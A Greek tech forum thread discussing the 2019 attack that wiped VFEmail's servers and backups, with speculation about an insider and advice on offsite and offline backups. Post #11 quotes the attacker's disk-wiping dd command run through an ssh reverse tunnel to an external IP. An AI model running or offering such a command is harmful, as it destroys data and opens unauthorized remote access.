Ο πάροχος υπηρεσιών email VFEmail βγήκε ουσιαστικά εκτός λειτουργίας, μετά την καταστροφική επίθεση που δέχτηκε στην υποδομή του από άγνωστο επιτιθέμενο, που διέγραψε πλήρως όλα τα δεδομένα και τα backups των χρηστών του στις ΗΠΑ, μέσα σε λίγες ώρες.
Η ζημιά περιλαμβάνει τους mail hosts, virtual machine hosts, και ένα SQL server cluster, ενώ έγινε αντιληπτή όταν ήδη γινόταν format στον backup server. Ο επιτιθέμενος φαίνεται να γνώριζε πολλαπλά passwords και χρησιμοποίησε τουλάχιστον 3 τρόπους επίθεσης.
Το VFEmail ιδρύθηκε το 2001 σαν απάντηση στον ιό ILOVEYOU που μόλυνε δεκάδες εκατομμύρια υπολογιστές με Windows και είχε σαν στόχο να προσφέρει καλύτερη υπηρεσία και ασφάλεια, ελέγχοντας τα μηνύματα για malware στον server, πριν παραδοθούν στον χρήστη.
Πηγή : Arstechnica
Εμφάνιση 1-15 από 39
-
13-02-19, 20:31 Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #1
- Εγγραφή
- 22-09-2003
- Μηνύματα
- 81.836
- Downloads
- 218
- Uploads
- 48
- Άρθρα
- 6
- Τύπος
- VDSL2
- Ταχύτητα
- 204800/20480
- ISP
- Wind
- Router
- Technicolor DGA4130
- SNR / Attn
- 6(dB) / 2.8(dB)
- Path Level
- Interleaved
-
13-02-19, 21:39 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #2
- Εγγραφή
- 08-01-2004
- Περιοχή
- Espoo, FI
- Ηλικία
- 51
- Μηνύματα
- 20.968
- Downloads
- 41
- Uploads
- 0
- Άρθρα
- 4
- Τύπος
- FTTH
- Ταχύτητα
- 1000/400
- ISP
- Elisa
- Router
- pfsense
Το διάβαζα το πρωί. Πολύ τρομακτικό γεγονός...
Ανυπόγραφος
-
13-02-19, 21:52 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #3
Κάποιος είχε απωθημένα και ήξερε πολλά...
-
13-02-19, 22:02 Re: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #4
Απίστευτα πράματα https://www.vfemail.net/
Ανταγωνιστής, γυναικοδουλειά, πρώην admin, inside job, περίεργη υπόθεση.
Ο vfemail ήταν ασφαλισμένος για τέτοιο κίνδυνο?
Ειχε και 4 τύπους paid accounts, θα τους αποζημιώσει τους χρήστες για τη ζημιά? (αυτός ή η insurance)
Who's next?
-
13-02-19, 23:24 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #5
-
13-02-19, 23:54 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #6
-
14-02-19, 00:22 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #7
Ωραιος mail provider και αυτος. Google ολε.
-
14-02-19, 00:26 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #8
κατά τη γνώμη μου, τα "backup" δεν είναι δυνατόν να είναι μόνο σε server ο οποίος επιπροσθέτως είναι και live.
με αυτή τη λογική, και φωτιά να έπιανε ο χώρος (ή όποια άλλη -φυσική ή μη - καταστροφή, π.χ. να κατέρεε το κτήριο που στεγάζονταν οι servers ή να καταστρέφονταν για οποιοδήποτε λόγο ν δίσκοι) πάλι θα ήταν out of business.
-
14-02-19, 00:41 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #9
Inside job? Επίδειξη δύναμης από τρίτο? Who knows...
Ηθικό δίδαγμα για μένα? Να κάνω κάνα archive στο σκληρό τα mailboxGreek Statistics black belt. https://www.r-project.org/
-
14-02-19, 00:56 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #10Υδραυλικός, φωτογράφος, εραστής και ποιητής...
http://www.flickr.com/photos/120411235@N06/
-
14-02-19, 07:41 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #11
Ηταν δωρο αγαπης της απατημενης sysadmin ελεω βαλεντινου. Πρεπει να προστεθουν και τα backups στα πραγματα που πρεπει να προσεχει κανεις που βαζει, μαζι με την υπογραφη και το πετουμενο.
Η δουλεια εγινε μεσω βουλγαριας και αντε βρες τον.
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559 via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N
-
14-02-19, 08:39 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #12
για αυτό παιδιά αν χρειαστεί να απολύσουμε ΙΤ / sysadmin και γενικά core employees, το κάνουμε με πολλλλυυυυυυυ κάλους όρους και καλές σχέσεις. πχ σε μεγάλες εταιρίες όταν θέλουν να ξεφορτωθούν πχ ένα top διευθυντή, τον βάζουν σε ένα γραφείο "ψυγείο" δίχως αντικείμενο και τον αφήνουν εκεί να έχει όσο χρόνο θέλει μέχρι να φύγει μόνος του (στην ουσία να βρει άλλη θέση). Ειδικά αν υπάρχει και non compete agreement, που δεν σε αφήνει να βρεις εύκολα δουλειά.
See first, think later, then test. But always see first. Otherwise you will only see what you were expecting. Most scientists forget that. - Douglas Adams
There's no right, there's no wrong, there's only popular opinion. - Jeffrey Goines (12 Monkeys)
-
14-02-19, 10:45 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #13
Μα το ότι είναι server δεν σημαίνει ότι θα είναι και στον ίδιο χώρο, τα δύο μεταξύ τους είναι άσχετα.
Προφανώς ένα τουλάχιστον backup πρέπει να είναι σε άλλο χώρο. Αν π.χ. ο server σου είναι στο datacenter X, το backup ιδανικά πρέπει να είναι στο datacenter Y, ακόμα πιο ιδανικά σε άλλη πόλη.
Σε αυτή την περίπτωση, ακόμα κι αν πέσει ατομική βόμβα κοντά στο Χ, το Υ δεν θα επηρεαστεί (λέμε τώρα).
Αν όμως κάποιος γνωρίζει πώς να έχει πρόσβαση και στους δύο server (ή σε τρεις, ή σε τέσσερις κ.ο.κ.), αυτό δεν έχει να κάνει με disaster recovery, εκεί μπορεί να μπει και να σβήσει ό,τι θέλει.
Το μόνο που ενδεχομένως θα σε γλίτωνε θα ήταν το offline backup, αλλά αυτό είναι εξαιρετικά μη πρακτικό. Γιατί όταν λέω offline δεν λέω απλώς να σηκώνεις ένα server (π.χ. στο ΕC2) να παίρνεις το backup και μετά να τον κλείνεις. Κι αυτόν θα μπορούσε ένας ex-admin να τον σβήσει. Εννοώ να παίρνεις backup σε κάποιο φυσικό μέσο (δίσκο, ταινία, στικάκι κλπ.) που θα βρίσκεται σε δικό σου χώρο και μετά να τον αποσυνδέεις. Αλλά ανάλογα με τον όγκο των δεδομένων (και αν μιλάμε για mail provider σίγουρα μιλάμε για πολύ μεγάλο όγκο δεδομένων) αυτό μπορεί να είναι από πολύ δύσκολο έως ακατόρθωτο.
-
14-02-19, 11:15 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #14
Το offline backup θα έπρεπε να είναι υποχρεωτικό σε τέτοιες περιπτώσεις, ειδικά επειδή έχει τόσα δεδομένα χρηστών. Για τόσο κρίσιμη υπηρεσία θα έπρεπε να έχουν ημερήσια tape backups τα οποία να εναλλάσουν σε διαφορετικά tape. Δεν είναι τόσο δύσκολο να προγραμματίσεις tape backups και απλά να πρέπει να πάει ένας άνθρωπος να αλλάξει κασέτα μία φορά την ημέρα...
-
14-02-19, 11:36 Απάντηση: Καταστροφική επίθεση στα δεδομένα 20 ετών του email provider VFEmail #15Όσοι το χάλκεον χέρι βαρύ του φόβου αισθάνονται,ζυγόν δουλείας ας έχωσι, θέλει αρετήν και τόλμην η ελευθερία. Ανδρέας Κάλβος
There is some shit, I will not eat. e.e.cummings
30 Hours per Week
Bookmarks